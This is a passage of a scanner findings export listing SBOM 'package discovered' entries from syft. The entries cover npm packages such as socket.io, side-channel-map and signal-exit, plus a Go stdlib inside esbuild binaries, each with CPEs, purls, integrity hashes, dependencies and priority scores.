integrity: sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==
dependencies:
es-errors: ^1.3.0
object-inspect: ^1.13.3
side-channel-list: ^1.0.0
side-channel-map: ^1.0.1
side-channel-weakmap: ^1.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 890b23d99b8d3706
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: side-channel-list 1.0.1'
title: side-channel-list 1.0.1
description: 'Package discovered: side-channel-list 1.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2e4a230ff21329f1
name: side-channel-list
version: 1.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:side-channel-list:side-channel-list:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side-channel-list:side_channel_list:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel_list:side-channel-list:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel_list:side_channel_list:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side-channel:side-channel-list:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side-channel:side_channel_list:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel:side-channel-list:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel:side_channel_list:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side:side-channel-list:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side:side_channel_list:1.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/side-channel-list@1.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/side-channel-list/-/side-channel-list-1.0.1.tgz
integrity: sha512-mjn/0bi/oUURjc5Xl7IaWi/OJJJumuoJFQJfDDyO46+hBWsfaVM65TBHq2eoZBhzl9EchxOijpkbRC8SVBQU0w==
dependencies:
es-errors: ^1.3.0
object-inspect: ^1.13.4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6043652240bb3202
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: side-channel-map 1.0.1'
title: side-channel-map 1.0.1
description: 'Package discovered: side-channel-map 1.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 36c9d18daa63eabd
name: side-channel-map
version: 1.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:side-channel-map:side-channel-map:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side-channel-map:side_channel_map:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel_map:side-channel-map:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel_map:side_channel_map:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side-channel:side-channel-map:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side-channel:side_channel_map:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel:side-channel-map:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel:side_channel_map:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side:side-channel-map:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side:side_channel_map:1.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/side-channel-map@1.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/side-channel-map/-/side-channel-map-1.0.1.tgz
integrity: sha512-VCjCNfgMsby3tTdo02nbjtM/ewra6jPHmpThenkTYh8pG9ucZ/1P8So4u4FGBek/BjpOVsDCMoLA/iuBKIFXRA==
dependencies:
call-bound: ^1.0.2
es-errors: ^1.3.0
get-intrinsic: ^1.2.5
object-inspect: ^1.13.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6c276e4fe79d17b1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: side-channel-weakmap 1.0.2'
title: side-channel-weakmap 1.0.2
description: 'Package discovered: side-channel-weakmap 1.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3a35b0f8b53bc97a
name: side-channel-weakmap
version: 1.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:side-channel-weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side-channel-weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel_weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel_weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side-channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side-channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/side-channel-weakmap@1.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/side-channel-weakmap/-/side-channel-weakmap-1.0.2.tgz
integrity: sha512-WPS/HvHQTYnHisLo9McqBHOJk2FkHO/tlpvldyrnem4aeQp4hai3gythswg6p01oSoTl58rcpiFAjF2br2Ak2A==
dependencies:
call-bound: ^1.0.2
es-errors: ^1.3.0
get-intrinsic: ^1.2.5
object-inspect: ^1.13.3
side-channel-map: ^1.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8acef3cde3b7b132
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: signal-exit 4.1.0'
title: signal-exit 4.1.0
description: 'Package discovered: signal-exit 4.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a63ea3d2efb32143
name: signal-exit
version: 4.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:signal-exit:signal-exit:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:signal-exit:signal_exit:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:signal_exit:signal-exit:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:signal_exit:signal_exit:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:signal:signal-exit:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:signal:signal_exit:4.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/signal-exit@4.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz
integrity: sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9476a789ac7d80fb
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: simple-swizzle 0.2.4'
title: simple-swizzle 0.2.4
description: 'Package discovered: simple-swizzle 0.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: cef7b2b2b70b3db8
name: simple-swizzle
version: 0.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:simple-swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:simple-swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:simple_swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:simple_swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:simple:simple-swizzle:0.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:simple:simple_swizzle:0.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/simple-swizzle@0.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/simple-swizzle/-/simple-swizzle-0.2.4.tgz
integrity: sha512-nAu1WFPQSMNr2Zn9PGSZK9AGn4t/y97lEm+MXTtUDwfP0ksAIX4nO+6ruD9Jwut4C49SB1Ws+fbXsm/yScWOHw==
dependencies:
is-arrayish: ^0.3.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ff9098f7bbabdf5b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: socket.io 4.8.3'
title: socket.io 4.8.3
description: 'Package discovered: socket.io 4.8.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5cc521e50bb4314d
name: socket.io
version: 4.8.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:socket:socket.io:4.8.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/socket.io@4.8.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/socket.io/-/socket.io-4.8.3.tgz
integrity: sha512-2Dd78bqzzjE6KPkD5fHZmDAKRNe3J15q+YHDrIsy9WEkqttc7GY+kT9OBLSMaPbQaEd0x1BjcmtMtXkfpc+T5A==
dependencies:
accepts: ~1.3.4
base64id: ~2.0.0
cors: ~2.8.5
debug: ~4.4.1
engine.io: ~6.6.0
socket.io-adapter: ~2.5.2
socket.io-parser: ~4.2.4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a08d32cd24a38070
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: socket.io-adapter 2.5.6'
title: socket.io-adapter 2.5.6
description: 'Package discovered: socket.io-adapter 2.5.6'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 423a38d81e2dc8e3
name: socket.io-adapter
version: 2.5.6
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:socket.io-adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:socket.io-adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:socket.io_adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:socket.io_adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:socket.io:socket.io-adapter:2.5.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:socket.io:socket.io_adapter:2.5.6:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/socket.io-adapter@2.5.6
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.5.6.tgz
integrity: sha512-DkkO/dz7MGln0dHn5bmN3pPy+JmywNICWrJqVWiVOyvXjWQFIv9c2h24JrQLLFJ2aQVQf/Cvl1vblnd4r2apLQ==
dependencies:
debug: ~4.4.1
ws: ~8.18.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 126bbc6e6f7db2d9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: socket.io-client 4.8.3'
title: socket.io-client 4.8.3
description: 'Package discovered: socket.io-client 4.8.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ecd3152d103ea0f9
name: socket.io-client
version: 4.8.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:socket.io-client:socket.io-client:4.8.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:socket.io-client:socket.io_client:4.8.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:socket.io_client:socket.io-client:4.8.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:socket.io_client:socket.io_client:4.8.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:socket.io:socket.io-client:4.8.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:socket.io:socket.io_client:4.8.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/socket.io-client@4.8.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/socket.io-client/-/socket.io-client-4.8.3.tgz
integrity: sha512-uP0bpjWrjQmUt5DTHq9RuoCBdFJF10cdX9X+a368j/Ft0wmaVgxlrjvK3kjvgCODOMMOz9lcaRzxmso0bTWZ/g==
dependencies:
'@socket.io/component-emitter': ~3.1.0
debug: ~4.4.1
engine.io-client: ~6.6.1
socket.io-parser: ~4.2.4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4e07aea60237064a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: socket.io-parser 4.2.6'
title: socket.io-parser 4.2.6
description: 'Package discovered: socket.io-parser 4.2.6'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f9190921d6308e46
name: socket.io-parser
version: 4.2.6
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:socket:socket.io-parser:4.2.6:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/socket.io-parser@4.2.6
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/socket.io-parser/-/socket.io-parser-4.2.6.tgz
integrity: sha512-asJqbVBDsBCJx0pTqw3WfesSY0iRX+2xzWEWzrpcH7L6fLzrhyF8WPI8UaeM4YCuDfpwA/cgsdugMsmtz8EJeg==
dependencies:
'@socket.io/component-emitter': ~3.1.0
debug: ~4.4.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1381d8de85a9f426
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: source-map-js 1.2.1'
title: source-map-js 1.2.1
description: 'Package discovered: source-map-js 1.2.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ef14348a3e7aef73
name: source-map-js
version: 1.2.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:source-map-js:source-map-js:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:source-map-js:source_map_js:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:source_map_js:source-map-js:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:source_map_js:source_map_js:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:source-map:source-map-js:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:source-map:source_map_js:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:source_map:source-map-js:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:source_map:source_map_js:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:source:source-map-js:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:source:source_map_js:1.2.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/source-map-js@1.2.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz
integrity: sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8a8949f600357d51
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: standard-as-callback 2.1.0'
title: standard-as-callback 2.1.0
description: 'Package discovered: standard-as-callback 2.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ae42b44f62499323
name: standard-as-callback
version: 2.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:standard-as-callback:standard-as-callback:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:standard-as-callback:standard_as_callback:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:standard_as_callback:standard-as-callback:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:standard_as_callback:standard_as_callback:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:standard-as:standard-as-callback:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:standard-as:standard_as_callback:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:standard_as:standard-as-callback:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:standard_as:standard_as_callback:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:standard:standard-as-callback:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:standard:standard_as_callback:2.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/standard-as-callback@2.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/standard-as-callback/-/standard-as-callback-2.1.0.tgz
integrity: sha512-qoRRSyROncaz1z0mvYqIE4lCd9p2R90i6GxW3uZv5ucSu8tU7B5HXUP1gG8pVZsYNVaXjk8ClXHPttLyxAL48A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4830d30cd7a05603
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: statuses 2.0.2'
title: statuses 2.0.2
description: 'Package discovered: statuses 2.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7442cb30a409bd68
name: statuses
version: 2.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:statuses:statuses:2.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/statuses@2.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/statuses/-/statuses-2.0.2.tgz
integrity: sha512-DvEy55V3DB7uknRo+4iOGT5fP1slR8wQohVdknigZPMpMstaKJQWhwiYBACJE3Ul2pTnATihhBYnRhZQHGBiRw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fce9dfc2e720150a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
startLine: 0
message: 'Package discovered: stdlib go1.20.12'
title: stdlib go1.20.12
description: 'Package discovered: stdlib go1.20.12'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 755a3e00c5f656c9
name: stdlib
version: go1.20.12
type: go-module
foundBy: go-module-binary-cataloger
locations:
- path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
accessPath: /node_modules/@esbuild/darwin-arm64/bin/esbuild
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations: []
language: go
cpes:
- cpe: cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:*
source: syft-generated
purl: pkg:golang/stdlib@1.20.12
metadataType: go-module-buildinfo-entry
metadata:
goCompiledVersion: go1.20.12
architecture: ''
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 684726e125b93b59
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/esbuild/bin/esbuild
startLine: 0
message: 'Package discovered: stdlib go1.20.12'
title: stdlib go1.20.12
description: 'Package discovered: stdlib go1.20.12'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e9a4a6eb4de31a0f
name: stdlib
version: go1.20.12
type: go-module
foundBy: go-module-binary-cataloger
locations:
- path: /node_modules/esbuild/bin/esbuild
accessPath: /node_modules/esbuild/bin/esbuild
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations: []
language: go
cpes:
- cpe: cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:*
source: syft-generated
purl: pkg:golang/stdlib@1.20.12
metadataType: go-module-buildinfo-entry
metadata:
goCompiledVersion: go1.20.12
architecture: ''
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
